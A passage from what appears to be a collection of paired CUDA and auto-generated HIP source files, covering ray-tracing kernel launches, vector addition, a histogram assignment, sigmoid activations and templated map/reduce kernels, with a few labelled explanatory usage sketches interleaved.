dtask->addTempHostMemoryToBeFreedOnCompletion(myLo); dtask->addTempHostMemoryToBeFreedOnCompletion(myHi); for (int l = 0; l < maxLevels; ++l) { myLo[l] = levelP[l].regionLo; // never use levelP regionLo or hi in the kernel. 
myHi[l] = levelP[l].regionHi; // They are different on each patch } CUDA_RT_SAFE_CALL( cudaMemcpyAsync( dev_regionLo, myLo, size, cudaMemcpyHostToDevice, *stream) ); CUDA_RT_SAFE_CALL( cudaMemcpyAsync( dev_regionHi, myHi, size, cudaMemcpyHostToDevice, *stream) ); //__________________________________ // copy levelParams array to constant memory on device CUDA_RT_SAFE_CALL(cudaMemcpyToSymbolAsync(d_levels, levelP, (maxLevels * sizeof(levelParams)),0, cudaMemcpyHostToDevice,*stream)); //__________________________________ // setup random number generator states on the device, 1 for each thread int numStates = dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z; curandState* randNumStates; randNumStates = (curandState*)GPUMemoryPool::allocateCudaSpaceFromPool(0, numStates * sizeof(curandState)); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, randNumStates); rayTraceDataOnionKernel< T ><<< dimGrid, dimBlock, 0, *stream >>>( dimGrid, dimBlock, matlIndex, patch, gridP, fineLevel_ROI_Lo, fineLevel_ROI_Hi, dev_regionLo, dev_regionHi, randNumStates, RT_flags, curTimeStep, abskg_gdw, sigmaT4_gdw, cellType_gdw, old_gdw, new_gdw); //cudaDeviceSynchronize(); //cudaError_t result = cudaPeekAtLastError(); //printf("After the error code for patch %d was %d\n", patch.ID, result); #if DEBUG > 0 cudaDeviceSynchronize(); #endif } //______________________________________________________________________ // Explicit template instantiations template __host__ void launchRayTraceKernel<double>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, const int matlIndx, levelParams level, patchParams patch, cudaStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); //______________________________________________________________________ // template __host__ void launchRayTraceKernel<float>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, const int matlIndx, levelParams level, patchParams patch, cudaStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* celltype_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); //______________________________________________________________________ // template __host__ void launchRayTraceDataOnionKernel<double>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, int matlIndex, patchParams patch, gridParams gridP, levelParams* levelP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, cudaStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); //______________________________________________________________________ // template __host__ void launchRayTraceDataOnionKernel<float>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, int matlIndex, patchParams patch, gridParams gridP, levelParams* levelP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, cudaStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); } //end namespace Uintah
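// A minimal, self-contained sketch (not part of the Uintah sources above) illustrating the
// seed-packing scheme that setupRandNumsSeedAndSequences() documents: 20 bits of patchID,
// 20 bits of the current timestep, and 24 bits of thread index folded into one 64-bit seed,
// with a small per-thread sequence number passed to curand_init(). The names packSeed and
// demoRandKernel are hypothetical and exist only for this example.
#include <curand_kernel.h>

__host__ __device__ inline unsigned long long packSeed(unsigned long long patchID,
                                                       unsigned long long curTimeStep,
                                                       unsigned long long threadId)
{
  return ((patchID & 0xFFFFF) << 44) | ((curTimeStep & 0xFFFFF) << 24) | (threadId & 0xFFFFFF);
}

__global__ void demoRandKernel(unsigned long long patchID, unsigned long long curTimeStep, double* out)
{
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  curandState state;
  // Large sequence numbers are expensive to initialize, so the sequence stays small (just the
  // thread id) and the uniqueness is pushed into the packed seed, mirroring the comments above.
  curand_init(packSeed(patchID, curTimeStep, tid), tid, 0, &state);
  out[tid] = curand_uniform_double(&state);   // uniform draw in (0, 1]
}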
bebdcc9057721fdb0efe24617096b587619d968c.hip
// !!! This is a file automatically generated by hipify!!! #include <stdio.h> #include <hip/hip_runtime.h> int *a, *b; // host data int *c, *c2; // results //Cuda error checking - non mandatory void cudaCheckError() { hipError_t e=hipGetLastError(); if(e!=hipSuccess) { printf("Cuda failure %s:%d: '%s'\n",__FILE__,__LINE__,hipGetErrorString(e)); exit(0); } } //GPU kernel __global__ void vecAdd(int *A,int *B,int *C,int N){ int i = blockIdx.x * blockDim.x + threadIdx.x; C[i] = A[i] + B[i]; } //CPU function void vecAdd_h(int *A1,int *B1, int *C1, int N){ for(int i = 0; i < N; i++) C1[i] = A1[i] + B1[i]; } int main(int argc,char **argv) { printf("Begin \n"); //Iterations int n=10000000; //Number of blocks int nBytes = n*sizeof(int); //Block size and number int block_size, block_no; //memory allocation a = (int *) malloc(nBytes); b = (int *) malloc(nBytes); c = (int *) malloc(nBytes); c2 = (int *) malloc(nBytes); int *a_d,*b_d,*c_d; block_size = 250; //threads per block block_no = n/block_size; //Work definition dim3 dimBlock(block_size, 1, 1); dim3 dimGrid(block_no, 1, 1); // Data filling for(int i=0;i<n;i++) a[i]=i,b[i]=i; printf("Allocating device memory on host..\n"); //GPU memory allocation hipMalloc((void **) &a_d, n*sizeof(int)); hipMalloc((void **) &b_d, n*sizeof(int)); hipMalloc((void **) &c_d, n*sizeof(int)); printf("Copying to device..\n"); hipMemcpy(a_d, a, n*sizeof(int), hipMemcpyHostToDevice); hipMemcpy(b_d, b, n*sizeof(int), hipMemcpyHostToDevice); clock_t start_d=clock(); printf("Doing GPU Vector add\n"); hipLaunchKernelGGL(( vecAdd), dim3(block_no),dim3(block_size), 0, 0, a_d, b_d, c_d, n); cudaCheckError(); //Wait for kernel call to finish hipDeviceSynchronize(); clock_t end_d = clock(); printf("Doing CPU Vector add\n"); clock_t start_h = clock(); vecAdd_h(a, b, c2, n); clock_t end_h = clock(); //Time computing double time_d = (double)(end_d-start_d)/CLOCKS_PER_SEC; double time_h = (double)(end_h-start_h)/CLOCKS_PER_SEC; //Copying data back to host, this is a blocking call and will not start until all kernels are finished hipMemcpy(c, c_d, n*sizeof(int), hipMemcpyDeviceToHost); printf("n = %d \t GPU time = %fs \t CPU time = %fs\n", n, time_d, time_h); //Free GPU memory hipFree(a_d); hipFree(b_d); hipFree(c_d); return 0; }
bebdcc9057721fdb0efe24617096b587619d968c.cu
#include <stdio.h> #include <cuda.h> int *a, *b; // host data int *c, *c2; // results //Cuda error checking - non mandatory void cudaCheckError() { cudaError_t e=cudaGetLastError(); if(e!=cudaSuccess) { printf("Cuda failure %s:%d: '%s'\n",__FILE__,__LINE__,cudaGetErrorString(e)); exit(0); } } //GPU kernel __global__ void vecAdd(int *A,int *B,int *C,int N){ int i = blockIdx.x * blockDim.x + threadIdx.x; C[i] = A[i] + B[i]; } //CPU function void vecAdd_h(int *A1,int *B1, int *C1, int N){ for(int i = 0; i < N; i++) C1[i] = A1[i] + B1[i]; } int main(int argc,char **argv) { printf("Begin \n"); //Iterations int n=10000000; //Number of blocks int nBytes = n*sizeof(int); //Block size and number int block_size, block_no; //memory allocation a = (int *) malloc(nBytes); b = (int *) malloc(nBytes); c = (int *) malloc(nBytes); c2 = (int *) malloc(nBytes); int *a_d,*b_d,*c_d; block_size = 250; //threads per block block_no = n/block_size; //Work definition dim3 dimBlock(block_size, 1, 1); dim3 dimGrid(block_no, 1, 1); // Data filling for(int i=0;i<n;i++) a[i]=i,b[i]=i; printf("Allocating device memory on host..\n"); //GPU memory allocation cudaMalloc((void **) &a_d, n*sizeof(int)); cudaMalloc((void **) &b_d, n*sizeof(int)); cudaMalloc((void **) &c_d, n*sizeof(int)); printf("Copying to device..\n"); cudaMemcpy(a_d, a, n*sizeof(int), cudaMemcpyHostToDevice); cudaMemcpy(b_d, b, n*sizeof(int), cudaMemcpyHostToDevice); clock_t start_d=clock(); printf("Doing GPU Vector add\n"); vecAdd<<<block_no,block_size>>>(a_d, b_d, c_d, n); cudaCheckError(); //Wait for kernel call to finish cudaThreadSynchronize(); clock_t end_d = clock(); printf("Doing CPU Vector add\n"); clock_t start_h = clock(); vecAdd_h(a, b, c2, n); clock_t end_h = clock(); //Time computing double time_d = (double)(end_d-start_d)/CLOCKS_PER_SEC; double time_h = (double)(end_h-start_h)/CLOCKS_PER_SEC; //Copying data back to host, this is a blocking call and will not start until all kernels are finished cudaMemcpy(c, c_d, n*sizeof(int), cudaMemcpyDeviceToHost); printf("n = %d \t GPU time = %fs \t CPU time = %fs\n", n, time_d, time_h); //Free GPU memory cudaFree(a_d); cudaFree(b_d); cudaFree(c_d); return 0; }
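// A hedged variant (not part of the original pair above): the vecAdd kernel relies on n being an
// exact multiple of block_size (10000000 / 250 here), since it performs no bounds check. The
// sketch below adds the usual guard and rounds the grid size up so arbitrary n is handled safely;
// the name vecAddBounded is hypothetical.
__global__ void vecAddBounded(const int *A, const int *B, int *C, int N) {
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if (i < N) {                      // guard the tail when N % blockDim.x != 0
        C[i] = A[i] + B[i];
    }
}

// Possible launch, reusing the device buffers from main() above:
//   int block_size = 250;
//   int block_no   = (n + block_size - 1) / block_size;   // round up
//   vecAddBounded<<<block_no, block_size>>>(a_d, b_d, c_d, n);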
4de61da26c26e68fb11975d6edbf4c469997baad.hip
// !!! This is a file automatically generated by hipify!!!
#include "hip/hip_runtime.h"
/******************************************************************************
*cr
*cr            (C) Copyright 2010 The Board of Trustees of the
*cr                        University of Illinois
*cr                         All Rights Reserved
*cr
******************************************************************************/

// Define your kernels in this file; you may use more than one kernel if you
// need to.

// INSERT KERNEL(S) HERE

__global__ void myHisto(unsigned int* input, unsigned int* bins,
                        unsigned int num_elements, unsigned int num_bins) {
    __shared__ unsigned int binL[4096]; // supports at most 4096 bins
    int step = 0;
    while (step < num_bins) {
        if (step + threadIdx.x < num_bins)
            binL[step + threadIdx.x] = 0;
        step += blockDim.x;
    }
    __syncthreads();
    int i = threadIdx.x + blockIdx.x * blockDim.x;
    int stride = blockDim.x * gridDim.x;
    while (i < num_elements) {
        atomicAdd(&binL[input[i]], 1);
        i += stride;
    }
    __syncthreads();
    step = 0;
    while (step < num_bins) {
        if (step + threadIdx.x < num_bins)
            atomicAdd(&bins[step + threadIdx.x], binL[step + threadIdx.x]);
        step += blockDim.x;
    }
}

/******************************************************************************
Setup and invoke your kernel(s) in this function. You may also allocate more
GPU memory if you need to
*******************************************************************************/
void histogram(unsigned int* input, unsigned int* bins, unsigned int num_elements,
               unsigned int num_bins) {
    // Criteria for choosing grid size and block size:
    // 1. Shared memory size: 4096 unsigned ints use 16 KB of shared memory.
    // 2. Efficiency: if each block keeps its own local bins, there will be
    //    #blocks * num_bins atomic writes to the global bins. Thus, the number of
    //    elements each block processes must be much larger than the number of bins.

    // INSERT CODE HERE
    int grids = sqrt(num_elements) / 64 + 1;
    dim3 dimGrid(grids, 1, 1);
    dim3 dimBlock(512, 1, 1);
    hipLaunchKernelGGL(( myHisto) , dim3(dimGrid), dim3(dimBlock), 0, 0, input, bins, num_elements, num_bins);
}
4de61da26c26e68fb11975d6edbf4c469997baad.cu
/******************************************************************************
*cr
*cr            (C) Copyright 2010 The Board of Trustees of the
*cr                        University of Illinois
*cr                         All Rights Reserved
*cr
******************************************************************************/

// Define your kernels in this file; you may use more than one kernel if you
// need to.

// INSERT KERNEL(S) HERE

__global__ void myHisto(unsigned int* input, unsigned int* bins,
                        unsigned int num_elements, unsigned int num_bins) {
    __shared__ unsigned int binL[4096]; // supports at most 4096 bins
    int step = 0;
    while (step < num_bins) {
        if (step + threadIdx.x < num_bins)
            binL[step + threadIdx.x] = 0;
        step += blockDim.x;
    }
    __syncthreads();
    int i = threadIdx.x + blockIdx.x * blockDim.x;
    int stride = blockDim.x * gridDim.x;
    while (i < num_elements) {
        atomicAdd(&binL[input[i]], 1);
        i += stride;
    }
    __syncthreads();
    step = 0;
    while (step < num_bins) {
        if (step + threadIdx.x < num_bins)
            atomicAdd(&bins[step + threadIdx.x], binL[step + threadIdx.x]);
        step += blockDim.x;
    }
}

/******************************************************************************
Setup and invoke your kernel(s) in this function. You may also allocate more
GPU memory if you need to
*******************************************************************************/
void histogram(unsigned int* input, unsigned int* bins, unsigned int num_elements,
               unsigned int num_bins) {
    // Criteria for choosing grid size and block size:
    // 1. Shared memory size: 4096 unsigned ints use 16 KB of shared memory.
    // 2. Efficiency: if each block keeps its own local bins, there will be
    //    #blocks * num_bins atomic writes to the global bins. Thus, the number of
    //    elements each block processes must be much larger than the number of bins.

    // INSERT CODE HERE
    int grids = sqrt(num_elements) / 64 + 1;
    dim3 dimGrid(grids, 1, 1);
    dim3 dimBlock(512, 1, 1);
    myHisto <<<dimGrid, dimBlock>>> (input, bins, num_elements, num_bins);
}
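// A hedged host-side driver (not part of the original assignment file) showing one way the
// histogram() wrapper above could be exercised. It assumes input and bins are device pointers,
// which matches how histogram() launches myHisto on them directly; buffer names and sizes are
// illustrative only.
#include <cstdio>
#include <cstdlib>
#include <cuda_runtime.h>

void histogram(unsigned int* input, unsigned int* bins,
               unsigned int num_elements, unsigned int num_bins);   // defined in the file above

int main() {
    const unsigned int numElements = 1u << 20;
    const unsigned int numBins     = 256;   // must stay <= 4096 (size of the shared binL array)

    // Host input with values already restricted to [0, numBins).
    unsigned int* h_input = (unsigned int*)malloc(numElements * sizeof(unsigned int));
    for (unsigned int i = 0; i < numElements; ++i) h_input[i] = i % numBins;

    unsigned int *d_input, *d_bins;
    cudaMalloc(&d_input, numElements * sizeof(unsigned int));
    cudaMalloc(&d_bins,  numBins * sizeof(unsigned int));
    cudaMemcpy(d_input, h_input, numElements * sizeof(unsigned int), cudaMemcpyHostToDevice);
    cudaMemset(d_bins, 0, numBins * sizeof(unsigned int));   // kernel accumulates with atomicAdd

    histogram(d_input, d_bins, numElements, numBins);
    cudaDeviceSynchronize();

    unsigned int* h_bins = (unsigned int*)malloc(numBins * sizeof(unsigned int));
    cudaMemcpy(h_bins, d_bins, numBins * sizeof(unsigned int), cudaMemcpyDeviceToHost);
    printf("bin[0] contains %u entries\n", h_bins[0]);

    free(h_input); free(h_bins);
    cudaFree(d_input); cudaFree(d_bins);
    return 0;
}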
c4e495af5bff79b52784ba2c0e3f444bcac5ab87.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" template<typename Destination, typename Data> __global__ void sigmoidActivationForward(size_t elements, Destination *dst, Data *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = 1 / (1 + exp((float)-src[kernelIndex])); } } template<> __global__ void sigmoidActivationForward(size_t elements, float *dst, float *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = 1 / (1 + exp(-src[kernelIndex])); } } template<> __global__ void sigmoidActivationForward(size_t elements, double *dst, double *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = 1 / (1 + exp(-src[kernelIndex])); } } template<typename Destination, typename Data> __global__ void sigmoidActivationBackward(size_t elements, Destination *dst, Data *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = src[kernelIndex] * (1 - src[kernelIndex]); } }
c4e495af5bff79b52784ba2c0e3f444bcac5ab87.cu
template<typename Destination, typename Data> __global__ void sigmoidActivationForward(size_t elements, Destination *dst, Data *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = 1 / (1 + exp((float)-src[kernelIndex])); } } template<> __global__ void sigmoidActivationForward(size_t elements, float *dst, float *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = 1 / (1 + exp(-src[kernelIndex])); } } template<> __global__ void sigmoidActivationForward(size_t elements, double *dst, double *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = 1 / (1 + exp(-src[kernelIndex])); } } template<typename Destination, typename Data> __global__ void sigmoidActivationBackward(size_t elements, Destination *dst, Data *src) { const size_t kernelIndex = blockDim.x * blockIdx.x + threadIdx.x; if (kernelIndex < elements) { dst[kernelIndex] = src[kernelIndex] * (1 - src[kernelIndex]); } }
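// A hedged usage sketch (not part of the original file): launching the templated sigmoid kernels
// above on a flat float buffer. The block size, grid rounding, and the helper name runSigmoidFloat
// are assumptions made only for this example; d_in and d_out are device pointers.
#include <cuda_runtime.h>

void runSigmoidFloat(float* d_out, float* d_in, size_t elements) {
    const int blockSize = 256;
    const int gridSize  = (int)((elements + blockSize - 1) / blockSize);

    // Template arguments are deduced as <float, float>, which selects the float specialization above.
    sigmoidActivationForward<<<gridSize, blockSize>>>(elements, d_out, d_in);

    // The backward kernel computes s * (1 - s); feeding it the forward output yields the
    // sigmoid derivative in place.
    sigmoidActivationBackward<<<gridSize, blockSize>>>(elements, d_out, d_out);

    cudaDeviceSynchronize();
}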
efe1adcbdf7e31857da1884ba3e9953dca96eaad.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> #define MAKE_NAME(prefix, fun, T) prefix ## _ ## fun ## _ ## T #define MAP_FUN_1(fun, T) \ extern "C" \ __global__ void MAKE_NAME(map, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *in, int inMajorStride) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(in[col * inMajorStride + row]);\ }\ }\ } #define MAP_BLOCK_SIZE 32 #define MAP_FUN_2(fun, T) \ extern "C" \ __global__ void MAKE_NAME(map2, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *a, int aMajorStride,\ const T *b, int bMajorStride) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(a[col * aMajorStride + row], b[col * bMajorStride + row]);\ }\ }\ }\ \ extern "C" \ __global__ void MAKE_NAME(map2_v_s, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *a, int aMajorStride,\ const T b) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(a[col * aMajorStride + row], b);\ }\ }\ }\ \ extern "C" \ __global__ void MAKE_NAME(map2_s_v, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T a,\ const T *b, int bMajorStride) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(a, b[col * bMajorStride + row]);\ }\ }\ }\ extern "C" \ __global__ void MAKE_NAME(map2_transpose, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *a, int aMajorStride,\ const T *b, int bMajorStride) {\ \ int numGroupsX = blockDim.x * gridDim.x;\ int numGroupsY = blockDim.y * gridDim.y;\ int firstBlockX = blockDim.x * blockIdx.x;\ int firstBlockY = blockDim.y * blockIdx.y;\ __shared__ T tile[MAP_BLOCK_SIZE][MAP_BLOCK_SIZE+1];\ \ /*x is row in a, col in b*/\ /*y is col in a, row in b*/\ \ for (int yb = firstBlockY; yb < cols; yb += numGroupsY) {\ for (int xb = firstBlockX; xb < rows; xb += numGroupsX) {\ int ylim = min(cols, yb + MAP_BLOCK_SIZE);\ int xlim = min(rows, xb + MAP_BLOCK_SIZE);\ \ \ /* use threadid.y for x here so that the y loop is on the first blockDim, which means coalesced reads*/\ for (int x = threadIdx.y + xb; x < xlim; x += blockDim.y) {\ for(int y = threadIdx.x + yb; y < ylim; y += blockDim.x) {\ tile[x-xb][y-yb] = b[x*bMajorStride + y];\ }\ }\ \ __syncthreads();\ for(int y = threadIdx.y + yb; y < ylim; y += blockDim.y) {\ for (int x = threadIdx.x + xb; x < xlim; x += blockDim.x) {\ out[x + y*outMajorStride] = fun(a[x + y * aMajorStride], tile[x-xb][y-yb]);\ }\ }\ __syncthreads();\ }\ }\ } /* for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for (int j = 0; j < ; j += BLOCK_ROWS) block[(threadIdx.y+j)*TILE_DIM + threadIdx.x] = idata[(y+j)*width + x]; for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] 
= fun(a[col * aMajorStride + row], b[col * bMajorStride + row]);\ }\ }\ }\ \ */ static __inline__ __device__ double shfl_down(double var, int delta, int width=warpSize) { int hi, lo; asm volatile( "mov.b64 { %0, %1 }, %2;" : "=r"(lo), "=r"(hi) : "d"(var) ); hi = __shfl_down( hi, delta, width ); lo = __shfl_down( lo, delta, width ); return __hiloint2double( hi, lo ); } static __inline__ __device__ int shfl_down(int var, int delta, int width=warpSize) { return __shfl_down(var, delta, width); } static __inline__ __device__ unsigned int shfl_down(unsigned int var, int delta, int width=warpSize) { int x = __shfl_down(*(int*)&var, delta, width); return *(unsigned int*)(&x); } static __inline__ __device__ float shfl_down(float var, int delta, int width=warpSize) { return __shfl_down(var, delta, width); } #define laneId (threadIdx.x & 0x1f) #define REDUCE_FUN(fun, T, identity) \ /* Each column gets 1 block of threads. TODO currently blocksize must be 1 warp*/\ extern "C" \ __global__ void MAKE_NAME(reduce, fun, T) (int rows, int cols,\ T *out,\ const T *in, int inMajorStride) {\ /*__shared__ T buffer[32];\*/\ \ T sum = identity;\ for(int col = threadIdx.y + blockIdx.y * blockDim.y; col < cols; col += blockDim.y * gridDim.y) {\ for(int row = threadIdx.x + blockIdx.x * blockDim.x; row < rows; row += blockDim.x * gridDim.x) {\ sum = fun(sum, in[col * inMajorStride + row]);\ }\ }\ \ __syncthreads();\ for (int i = 1; i < blockDim.x; i *= 2) {\ T x = shfl_down(sum, i);\ sum = fun(sum, x);\ }\ \ if(laneId == 0) {\ out[blockIdx.x * gridDim.y + blockIdx.y] = sum;\ }\ }\ \ /* Each column gets 1 block of threads. TODO currently blocksize must be 1 warp*/\ extern "C" \ __global__ void MAKE_NAME(reduce_col, fun, T) (int rows, int cols,\ T *out,\ const T *in, int inMajorStride) {\ /*__shared__ T buffer[32];\*/\ \ for(int col = threadIdx.y + blockIdx.x * blockDim.y; col < cols; col += blockDim.y * gridDim.x) {\ T sum = identity;\ for(int row = threadIdx.x; row < rows; row += blockDim.x) {\ sum = fun(sum, in[col * inMajorStride + row]);\ }\ \ __syncthreads();\ for (int i = 1; i < blockDim.x; i *= 2) {\ T x = shfl_down(sum, i);\ sum = fun(sum, x);\ }\ \ if(laneId == 0) {\ out[col] = sum;\ }\ }\ }\ \ \ /*Each row has its own thread. We should make multiple threads per row, but later. TODO */\ extern "C" \ __global__ void MAKE_NAME(reduce_row, fun, T) (int rows, int cols,\ T *out,\ const T *in, int inMajorStride) {\ /* __shared__ T buffer[32];*/\ \ int numReducers = blockDim.x * gridDim.x;\ for(int row = threadIdx.x + blockIdx.x * blockDim.x; row < rows; row += numReducers) {\ T sum = identity;\ for(int col = 0; col < cols; col++) {\ sum = fun(sum, in[col * inMajorStride + row]);\ }\ \ out[row] = sum;\ }\ }\ #include "function_decls.cuh"
efe1adcbdf7e31857da1884ba3e9953dca96eaad.cu
#include <stdio.h> #define MAKE_NAME(prefix, fun, T) prefix ## _ ## fun ## _ ## T #define MAP_FUN_1(fun, T) \ extern "C" \ __global__ void MAKE_NAME(map, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *in, int inMajorStride) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(in[col * inMajorStride + row]);\ }\ }\ } #define MAP_BLOCK_SIZE 32 #define MAP_FUN_2(fun, T) \ extern "C" \ __global__ void MAKE_NAME(map2, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *a, int aMajorStride,\ const T *b, int bMajorStride) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(a[col * aMajorStride + row], b[col * bMajorStride + row]);\ }\ }\ }\ \ extern "C" \ __global__ void MAKE_NAME(map2_v_s, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *a, int aMajorStride,\ const T b) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(a[col * aMajorStride + row], b);\ }\ }\ }\ \ extern "C" \ __global__ void MAKE_NAME(map2_s_v, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T a,\ const T *b, int bMajorStride) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(a, b[col * bMajorStride + row]);\ }\ }\ }\ extern "C" \ __global__ void MAKE_NAME(map2_transpose, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *a, int aMajorStride,\ const T *b, int bMajorStride) {\ \ int numGroupsX = blockDim.x * gridDim.x;\ int numGroupsY = blockDim.y * gridDim.y;\ int firstBlockX = blockDim.x * blockIdx.x;\ int firstBlockY = blockDim.y * blockIdx.y;\ __shared__ T tile[MAP_BLOCK_SIZE][MAP_BLOCK_SIZE+1];\ \ /*x is row in a, col in b*/\ /*y is col in a, row in b*/\ \ for (int yb = firstBlockY; yb < cols; yb += numGroupsY) {\ for (int xb = firstBlockX; xb < rows; xb += numGroupsX) {\ int ylim = min(cols, yb + MAP_BLOCK_SIZE);\ int xlim = min(rows, xb + MAP_BLOCK_SIZE);\ \ \ /* use threadid.y for x here so that the y loop is on the first blockDim, which means coalesced reads*/\ for (int x = threadIdx.y + xb; x < xlim; x += blockDim.y) {\ for(int y = threadIdx.x + yb; y < ylim; y += blockDim.x) {\ tile[x-xb][y-yb] = b[x*bMajorStride + y];\ }\ }\ \ __syncthreads();\ for(int y = threadIdx.y + yb; y < ylim; y += blockDim.y) {\ for (int x = threadIdx.x + xb; x < xlim; x += blockDim.x) {\ out[x + y*outMajorStride] = fun(a[x + y * aMajorStride], tile[x-xb][y-yb]);\ }\ }\ __syncthreads();\ }\ }\ } /* for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for (int j = 0; j < ; j += BLOCK_ROWS) block[(threadIdx.y+j)*TILE_DIM + threadIdx.x] = idata[(y+j)*width + x]; for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(a[col * aMajorStride + row], b[col * bMajorStride + row]);\ }\ }\ }\ \ */ static 
__inline__ __device__ double shfl_down(double var, int delta, int width=warpSize) { int hi, lo; asm volatile( "mov.b64 { %0, %1 }, %2;" : "=r"(lo), "=r"(hi) : "d"(var) ); hi = __shfl_down( hi, delta, width ); lo = __shfl_down( lo, delta, width ); return __hiloint2double( hi, lo ); } static __inline__ __device__ int shfl_down(int var, int delta, int width=warpSize) { return __shfl_down(var, delta, width); } static __inline__ __device__ unsigned int shfl_down(unsigned int var, int delta, int width=warpSize) { int x = __shfl_down(*(int*)&var, delta, width); return *(unsigned int*)(&x); } static __inline__ __device__ float shfl_down(float var, int delta, int width=warpSize) { return __shfl_down(var, delta, width); } #define laneId (threadIdx.x & 0x1f) #define REDUCE_FUN(fun, T, identity) \ /* Each column gets 1 block of threads. TODO currently blocksize must be 1 warp*/\ extern "C" \ __global__ void MAKE_NAME(reduce, fun, T) (int rows, int cols,\ T *out,\ const T *in, int inMajorStride) {\ /*__shared__ T buffer[32];\*/\ \ T sum = identity;\ for(int col = threadIdx.y + blockIdx.y * blockDim.y; col < cols; col += blockDim.y * gridDim.y) {\ for(int row = threadIdx.x + blockIdx.x * blockDim.x; row < rows; row += blockDim.x * gridDim.x) {\ sum = fun(sum, in[col * inMajorStride + row]);\ }\ }\ \ __syncthreads();\ for (int i = 1; i < blockDim.x; i *= 2) {\ T x = shfl_down(sum, i);\ sum = fun(sum, x);\ }\ \ if(laneId == 0) {\ out[blockIdx.x * 